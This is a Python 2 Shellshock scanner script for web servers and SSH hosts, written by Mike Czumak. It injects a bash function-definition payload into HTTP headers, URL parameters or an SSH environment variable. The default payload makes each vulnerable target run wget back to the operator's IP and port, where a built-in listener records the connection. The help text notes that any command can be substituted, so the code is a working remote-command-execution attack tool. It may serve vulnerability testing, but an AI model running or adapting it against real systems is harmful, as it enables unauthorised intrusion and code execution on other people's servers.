#!/usr/bin/python
# shellshock.py -- a simple HTTP and SSH Shellshock scanner                       
# Author: Mike Czumak (T_v3rn1x) - @SecuritySift
# You are free to share and/or reuse all or portions of this code as long as it's not for commercial purposes
# Absolutely no warranty or promises of reliability, accuracy, or performance. Use at your own risk

import sys, os
import time
import socket
import urllib, urllib2
import argparse
import urlparse
import paramiko
import getpass
import subprocess, multiprocessing
from multiprocessing import Process, Queue, Lock, current_process, Manager

class print_colors:
    SUCCESS = '\033[92m'
    ERROR = '\033[91m'
    END = '\033[0m'

verbose = False
pwd = ""
	
#################################################
###############    Args/Usage     ###############
#################################################
		
def get_args():
	global verbose
	global pwd
	parser = argparse.ArgumentParser( prog="shellshock.py", 
									  formatter_class=lambda prog: argparse.HelpFormatter(prog,max_help_position=50),
									  epilog= '''
									  This script was written to check for the presence of the shellshock 
									  bash vulnerability on web servers, though it could be used to send any cmd via
									  an HTTP header or URL/GET parameter. It has a built-in listener that can accept multiple 
									  connections. Usage is simple: provide a list of targets and choose a scan type.
									  Note the default scan type (1) injects in Headers only. You can set the specific headers
									  in the script. A scan type of None (0) will simply make a web request to the target 
									  URLs without injecting anything into the headers or URL params. This is ideal 
									  if you are using an intercepting proxy to make your modifications. When providing your own
									  injection cmd, use {$IP} and {$PORT} as placeholders for your callback/listener IP and 
									  PORT respectively. The script will fill them in with either the values you provide
									  via the arguments or using the defaults (your local IP and port 7777). Providing an 
									  alternative IP is especially useful if you are port forwarding your connection.
									  You also have the option to set a local proxy, change your listener port, and choose 
									  the number of multiprocessing workers and HTTP request timeouts to 
									  enhance performance. DISCLAIMER: This script is provided as-is. I make no promises 
									  regarding its reliability or performance. Use responsibly and at your own risk!''')
	
	parser.add_argument("type", help="Type of Scan: H=HTTP, S=SSH")								  
	parser.add_argument("file", help="File containing target URLs")
	parser.add_argument("-s", "--scan", type=int, default=1, help="Scan Type (for HTTP scan only): 0=None, 1=Headers, 2=Params, 3=Both")
	parser.add_argument("-u", "--user", help="User name for SSH authentication (SSH scan only)")
	parser.add_argument("-c", "--cmd", default="() { :; }; /usr/bin/wget -t 1 http://{$IP}:{$PORT}", help="Test sploit cmd. Default=() { :; }; /usr/bin/wget -t 1 http://{$IP}:{$PORT}")
	parser.add_argument("-x", "--proxy", help="Intercepting proxy formatted as IP:PORT")
	parser.add_argument("-p", "--lport", default="7777", help="Local listener PORT. Default=7777")
	parser.add_argument("-i", "--localip", help="IP to send with cmd for any remote callback. Defaults to current IP. Set if port forwarding")
	parser.add_argument("-w", "--workers", type=int, default=4, help="Number of workers for multiprocessing. Default=4")
	parser.add_argument("-t", "--timeout", type=float, default=None, help="Scanner connection timeout. Default=None")
	parser.add_argument("-v", "--verbose", action="store_true", help="Turn on verbosity to see detailed scan output and errors")
	
	args = parser.parse_args()
	verbose = args.verbose

	# Initial args check
	if args.type.strip() != "S" and args.type != "H":
		print_msg("cerror", ("No scan type selected. Exiting...\n"))
		sys.exit(2)
	if args.type == 'S':
		pwd = getpass.getpass("SSH Password: ")
			
	print_msg("none", ("Proxy set to %s" % args.proxy))
	print_msg("none", ("Number of workers set to %i" % args.workers))
	
	if not args.timeout:
		to = "None"
		print_msg("none", ("Timeout set to %s" % to))

	if not args.localip:
		print_msg("none", ("Callback IP set to %s" % get_myip(False)))
	else:
		print_msg("none", ("Callback IP set to" % args.localip))
		
	return args

#################################################
###############   Print Function  ###############
#################################################

''' universal print function with formatting '''
def print_msg (msgtype, msgcontent):
	endcolor = print_colors.END
	
	if msgtype == "cerror": #critical error, always show
		startcolor = print_colors.ERROR
		print("%s[!] ERROR: %s%s" % (startcolor, msgcontent, endcolor))
		
	elif msgtype == "error":
		startcolor = print_colors.ERROR
		if verbose:
			print("%s[!] ERROR: %s%s" % (startcolor, msgcontent, endcolor))
	
	elif msgtype == "details":
		if verbose:
			print("%s" % (msgcontent))
	
	elif msgtype == "success":
		startcolor = print_colors.SUCCESS
		print("%s[*] SUCCESS: %s%s" % (startcolor, msgcontent, endcolor))
	
	else:
		print("%s" % (msgcontent))
		
#################################################
############     Multiprocessing     ############
#################################################	

''' worker function for multiprocessing '''				
def worker(targets, args_in):
	try:
		for target in iter(targets.get, 'END'):	
			scan_host(target, args_in)		

	except:
		print_msg("cerror", str(sys.exc_info()[0]) + str(sys.exc_info()[1]))
		sys.exit(2)
			
			
''' schedule scans via multiprocessing '''		
def multi_proc(file_in, args_in):

	targets = Queue() # work queue of provided targets
   	processes = []

	for target in file_in: # build the queue
		if (target != '') and (target != '\n'):
			target = target.strip()
			targets.put(target)
			
	for w in xrange(args_in.workers):
		p = Process(target=worker, args=(targets, args_in))
		p.start()
		processes.append(p)
		targets.put('END')

	for p in processes:
		p.join()

#################################################
###########      Get Current IP        ##########
#################################################

''' Test network connectivity and get IP Address '''
def get_myip(localip):

# get IP address (either programmatically or from arg)

	if localip:
		ip = localip.strip()
	else:	
		try:
			s = socket.socket(socket.AF_INET, socket.SOCK_DGRAM); 
			s.connect(('8.8.8.8', 80))
			ip = s.getsockname()[0]
			s.close()
		except Exception, e:
			print_msg("cerror", "Error establishing Internet Connection. Error: %s" % (e.message))
			sys.exit(2)
	
	return ip	


#################################################
###########       Start Proxy          ##########
#################################################

def start_proxy(proxy):
# configure proxy	   
	if (proxy):
		proxy = urllib2.ProxyHandler({'http': proxy, 'https': proxy})
		opener = urllib2.build_opener(proxy)
		urllib2.install_opener(opener)


#################################################
#####  Mod URL Params / Build Injection Cmd  ####
#################################################
	
''' modify the url parameters to replace values with test injection string '''
def mod_url(cmd_in, url_in):
	
	new_url = url_in.split("?")[0] # base URL for rebuilding w/ injected params
	parsed = urlparse.urlparse(url_in)
	params = urlparse.parse_qsl(parsed.query)
	
	sep = "?" # first param separator in url
	for param, value in params:	
		
		# append ip and port to cmd sploit string
		new_value = urllib.quote_plus(cmd_in)
		new_param = sep + param + "=" + new_value
		new_url += new_param
		sep = "&" # subsequent url param separators

	return new_url

''' insert the IP and PORT into sploit cmd'''
def build_cmd(cmd_in, ip_in, port_in):

	cmd_out = cmd_in.replace("{$IP}", ip_in);
	#cmd_out = cmd_out.replace("{$PORT}", port_in);
	cmd_out = cmd_out.replace("{$PORT}", port_in);
	return cmd_out


#################################################
############        HTTP Scan       #############
#################################################

''' unauthenticated HTTP scan w/ header or param injection '''

def http_scan(target, inject, scantype, timeout):

	# modify the target header if in scope
	if scantype == 1 or scantype == 3: # headers or both
		header_inject = inject # no modification at this time
	else:
		header_inject = "" # not header injection; set headers to blank string
	
	# modify the target url if parameters in scope
	if scantype == 2 or scantype == 3: # url or both
		target = mod_url(inject, target)
	
	try:  # append the sploit to the header(s)
		req = urllib2.Request(   
								 target, 
								 headers={ 
								 "User-Agent": header_inject,
								 "Cookie" : "",									 
								 "Referer" : header_inject,
								 "Accept" : header_inject,	
								 "Host" : "",							 
								 "Junk" : header_inject
							   })
		
		
		# print scan info
		if len(str(target)) > 50:
			print_target = str(target[:50]) + "..."
		else:
			print_target = str(target)
			
		if scantype == 0:
			print_inject = "None -- check scan option"
		else:
			print_inject = str(inject)
				
		print_msg("details", ("[i] Testing Target Url: %s with injection: %s" % (print_target, str(print_inject))))
		
		# make request to target 
		res = urllib2.urlopen(req, timeout=timeout).read()

	except:
		print_msg("error", ( "[%s] %s%s" % ( str(target), str(sys.exc_info()[0]), str(sys.exc_info()[1]))))

#################################################
############        SSH Scan        #############
#################################################

''' authenticate via SSH and attempt inject string '''
def ssh_scan(target, user, inject, timeout_in):
	cmd = "env x='"+ inject + "' bash -c 'test'"
	ssh = paramiko.SSHClient()
	ssh.set_missing_host_key_policy(paramiko.AutoAddPolicy()) # avoid cert prompt
	try:
		ssh.connect(target, username=user, password=pwd, timeout=timeout_in)
		print_msg("details", ("[i] Connected to: %s. Trying injection string: %s" % (target, cmd)))
		stdin,stdout,stderr = ssh.exec_command(cmd)
		type(stdin) # execute command
		resp = stdout.readlines()
		ssh.close()
	except:
		print_msg("error", ( "[%s] %s%s" % ( str(target), str(sys.exc_info()[0]), str(sys.exc_info()[1]))))
	
#################################################
#########      Main Scan Function      ##########
#################################################
	
''' execute the scan '''			
def scan_host(target, args_in):
	
	myip = get_myip(args_in.localip) # assign listener ip
	start_proxy(args_in.proxy) # start proxy if set by user
	inject = build_cmd(args_in.cmd, myip, args_in.lport) # build injection string
	
	if args_in.type == "S":
		ssh_scan(target, args_in.user, inject, args_in.timeout)
	elif args_in.type == "H":
		http_scan(target, inject, args_in.scan, args_in.timeout)


#################################################
###############   Listener Code   ###############
#################################################

''' bind the listener socket '''
def bind_socket(HOST, PORT):
	s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
	
	try:
		s.bind((HOST, PORT))
	except Exception, e:
		print_msg("cerror", ("[!] Bind Failed. Error: %s" % (e)))
		sys.exit(2)
		
	s.listen(5)
	print_msg("none", ("Listening on port %d\n" % PORT))
	return s


''' open a listener for connect-back '''
def config_listener (port):
	HOST = ''
	PORT = int(port)

	s = bind_socket(HOST, PORT)
	
	while 1:
		conn, addr = s.accept()
		print_msg("success", ("Received connection from %s %d" % (addr[0], addr[1])))
		conn.close()

	s.close()


''' initiate the listener daemon'''	
def set_listener(port):	
	d = multiprocessing.Process(name='listener', target = config_listener, args=(port,))
	d.daemon = True
	d.start()
	time.sleep(1)
	

#################################################
###############        Main       ###############
#################################################

def main():
	print
	print '============================================================================='
	print '|                     HTTP AND SSH SHELLSHOCK SCANNER                       |'
	print '|               Author: Mike Czumak (T_v3rn1x) - @SecuritySift              |'
	print '=============================================================================\n'
	
	args = get_args() # get the cl args
	set_listener(args.lport)
	
	print_msg("", "Starting Scan...")
	# if a target list file was provided, use multiprocessing to get results
   	f = open(args.file, 'r') 
   	multi_proc(f, args)			
	f.close()
	
	print_msg("", "\nScan Completed\n")	
		
if __name__ == '__main__':
	main()